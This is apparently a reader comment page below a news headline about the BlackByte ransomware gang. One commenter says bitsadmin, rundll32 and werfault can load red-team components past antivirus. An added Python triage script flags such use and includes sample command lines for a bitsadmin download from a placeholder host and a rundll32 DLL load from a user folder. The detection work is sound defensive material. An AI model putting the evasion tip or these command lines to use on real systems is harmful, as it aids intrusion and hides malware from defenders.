Hot glare of the spotlight doesn’t slow BlackByte ransomware gang

Clausewitz4.0
Devil

Re: "living-off-the-land binaries"

Bitsadmin.exe, rundll32.exe, werfault.exe and others can be invoked to load/side load your red team components without being detected or flagged as malicious by an AV.

Quite effective.
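A defender's view of the binaries named in the comment above, as an added example that is not part of the original post: a small triage routine over process-creation events. The field names are modelled on Sysmon Event ID 1, the sample events are constructed, and the path and argument heuristics are assumptions, not a complete rule set.

```python
import re
from ntpath import basename, dirname

WATCHED = {"bitsadmin.exe", "rundll32.exe", "werfault.exe"}  # named in the comment
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# Assumed heuristics, not an exhaustive rule set:
USER_WRITABLE = re.compile(r"\\(users|programdata|windows\\temp)\\", re.I)
BITS_DOWNLOAD = re.compile(r"/(transfer|addfile)\b.*https?://", re.I)


def triage(event):
    """Return the reasons a process-creation event deserves analyst review."""
    image, cmd = event["Image"].lower(), event["CommandLine"]
    name = basename(image)
    if name not in WATCHED:
        return []
    reasons = []
    # A trusted binary name outside its home directory suggests a staged copy.
    if dirname(image) not in SYSTEM_DIRS:
        reasons.append("runs outside the system directory")
    # Inspect only the arguments, not the image path itself.
    idx = cmd.lower().find(name)
    args = cmd[idx + len(name):] if idx >= 0 else cmd
    if name == "rundll32.exe" and USER_WRITABLE.search(args):
        reasons.append("loads a module from a user-writable path")
    if name == "bitsadmin.exe" and BITS_DOWNLOAD.search(args):
        reasons.append("starts a BITS download from the command line")
    return reasons


# Constructed sample events for illustration only.
EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\Public\update.dll,Start"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer job1 https://example.invalid/u.bin C:\ProgramData\u.bin"},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\werfault.exe",
     "CommandLine": r"C:\Users\bob\AppData\Local\Temp\werfault.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        for reason in triage(ev):
            print(f"{ev['CommandLine']}\n    -> {reason}")
```

Signature-based AV sees only a signed Microsoft binary in each flagged case, which is why the review has to key on path and arguments rather than on the file itself.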


Biting the hand that feeds IT © 1998–2022